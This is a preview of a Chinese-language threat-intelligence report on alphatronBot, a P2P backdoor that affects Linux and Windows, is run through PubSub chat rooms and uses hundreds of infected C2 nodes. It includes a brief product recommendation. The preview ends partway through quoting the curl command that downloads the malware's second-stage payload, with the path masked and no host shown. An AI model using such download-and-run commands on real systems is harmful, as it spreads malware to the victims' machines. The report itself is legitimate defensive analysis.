去中心化的噩梦：隐藏在 P2P 网络下的后门 alphatronBot

文章预览

概述 奇安信威胁情报中心在最近的日常运营过程中观察到一款基于 P2P 协议的后门程序，通过 PubSub 聊天室的形式进行控制，后门内置了 700 多个受感染的 P2P C2节点，影响 linux 和 windows 双平台，国内大量政企中招，我们将其命名为 alphatronBot，拥有远控功能，并且会下发特定的 payload，经过溯源发现 alphatronBot 最早出现于 2023 年初，在 2024 年 4 月份初进行重构，目前已经观察到受感染的 P2P 节点被当作网络代理进行爆破活动。 我们建议政企客户在办公区和服务器区同时部署天擎EDR，最新版本的病毒库已经支持对新老版本 alphatronBot 的查杀。 alphatronBot 2024 年的 alphatronBot 一般作为第二阶段的载荷被攻击者通过 curl 命令远程下发,我们推测 alphatronBot 可能加入了 MAAS 分发机制，利用通用攻击面进行传播： Cmd 命令 curl -k -o  "***AppData\Local\Temp\NetFramework.4.8.7z" -L ………………………………